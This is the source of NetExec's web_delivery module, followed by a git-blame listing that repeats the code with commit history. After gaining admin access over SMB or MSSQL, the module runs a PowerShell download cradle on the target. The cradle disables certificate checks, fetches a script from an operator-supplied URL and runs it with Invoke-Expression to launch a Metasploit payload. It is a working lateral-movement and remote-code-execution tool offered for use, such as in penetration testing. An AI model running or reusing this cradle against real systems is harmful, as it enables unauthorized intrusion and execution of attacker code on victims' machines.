NetExec/nxc/modules/web_delivery.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from sys import exit


class NXCModule:
    """
    Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
    Reference: https://github.com/EmpireProject/Empire/blob/2.0_beta/data/module_source/code_execution/Invoke-MetasploitPayload.ps1

    Module by @byt3bl33d3r
    """

    name = "web_delivery"
    description = "Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module"
    supported_protocols = ["smb", "mssql"]
    opsec_safe = True
    multiple_hosts = True

    def options(self, context, module_options):
        """
        URL  URL for the download cradle
        PAYLOAD  Payload architecture (choices: 64 or 32) Default: 64
        """

        if "URL" not in module_options:
            context.log.fail("URL option is required!")
            exit(1)

        self.url = module_options["URL"]

        self.payload = "64"
        if "PAYLOAD" in module_options:
            if module_options["PAYLOAD"] not in ["64", "32"]:
                context.log.fail("Invalid value for PAYLOAD option!")
                exit(1)
            self.payload = module_options["PAYLOAD"]

    def on_admin_login(self, context, connection):
        ps_command = f"""[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('{self.url}');"""
        if self.payload == "32":
            connection.ps_execute(ps_command, force_ps32=True)
        else:
            connection.ps_execute(ps_command, force_ps32=False)
        context.log.success("Executed web-delivery launcher")
Adding shebang and encoding utf-8 for all python files 2022-07-18 23:59:14 +00:00			`#!/usr/bin/env python3`
			`# -- coding: utf-8 --`

Added web_delivery module 2017-05-08 06:24:01 +00:00			`from sys import exit`

black formating 2023-05-02 15:17:59 +00:00
Rename Module Classname to match python convention 2023-09-17 20:20:40 +00:00			`class NXCModule:`
fix(docs): replace single quote doc strings with double quote 2023-04-07 16:40:48 +00:00			`"""`
black formating 2023-05-02 15:17:59 +00:00			`Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module`
			`Reference: https://github.com/EmpireProject/Empire/blob/2.0_beta/data/module_source/code_execution/Invoke-MetasploitPayload.ps1`
Added web_delivery module 2017-05-08 06:24:01 +00:00
black formating 2023-05-02 15:17:59 +00:00			`Module by @byt3bl33d3r`
fix(docs): replace single quote doc strings with double quote 2023-04-07 16:40:48 +00:00			`"""`
Added web_delivery module 2017-05-08 06:24:01 +00:00
black formating 2023-05-02 15:17:59 +00:00			`name = "web_delivery"`
			`description = "Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module"`
			`supported_protocols = ["smb", "mssql"]`
Fixed Powershell execution using MSSQL 2017-10-25 06:45:58 +00:00			`opsec_safe = True`
Added web_delivery module 2017-05-08 06:24:01 +00:00			`multiple_hosts = True`

			`def options(self, context, module_options):`
fix(docs): replace single quote doc strings with double quote 2023-04-07 16:40:48 +00:00			`"""`
Added web_delivery module 2017-05-08 06:24:01 +00:00			`URL URL for the download cradle`
Added the option to select architecture (64 or 32) The module only allowed 32 bits, with this change it is possible to select 32 bits or 64 bits architecture. 2022-11-09 11:07:29 +00:00			`PAYLOAD Payload architecture (choices: 64 or 32) Default: 64`
fix(docs): replace single quote doc strings with double quote 2023-04-07 16:40:48 +00:00			`"""`
Added web_delivery module 2017-05-08 06:24:01 +00:00
automatic ruff fixing 2023-09-20 15:59:16 +00:00			`if "URL" not in module_options:`
black formating 2023-05-02 15:17:59 +00:00			`context.log.fail("URL option is required!")`
Added web_delivery module 2017-05-08 06:24:01 +00:00			`exit(1)`

black formating 2023-05-02 15:17:59 +00:00			`self.url = module_options["URL"]`
Added web_delivery module 2017-05-08 06:24:01 +00:00
Added the option to select architecture (64 or 32) The module only allowed 32 bits, with this change it is possible to select 32 bits or 64 bits architecture. 2022-11-09 11:07:29 +00:00			`self.payload = "64"`
black formating 2023-05-02 15:17:59 +00:00			`if "PAYLOAD" in module_options:`
			`if module_options["PAYLOAD"] not in ["64", "32"]:`
			`context.log.fail("Invalid value for PAYLOAD option!")`
Added the option to select architecture (64 or 32) The module only allowed 32 bits, with this change it is possible to select 32 bits or 64 bits architecture. 2022-11-09 11:07:29 +00:00			`exit(1)`
black formating 2023-05-02 15:17:59 +00:00			`self.payload = module_options["PAYLOAD"]`
Added the option to select architecture (64 or 32) The module only allowed 32 bits, with this change it is possible to select 32 bits or 64 bits architecture. 2022-11-09 11:07:29 +00:00
Added web_delivery module 2017-05-08 06:24:01 +00:00			`def on_admin_login(self, context, connection):`
fix string interpolation 2023-09-24 04:06:51 +00:00			`ps_command = f"""[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('{self.url}');"""`
Added the option to select architecture (64 or 32) The module only allowed 32 bits, with this change it is possible to select 32 bits or 64 bits architecture. 2022-11-09 11:07:29 +00:00			`if self.payload == "32":`
			`connection.ps_execute(ps_command, force_ps32=True)`
			`else:`
			`connection.ps_execute(ps_command, force_ps32=False)`
black formating 2023-05-02 15:17:59 +00:00			`context.log.success("Executed web-delivery launcher")`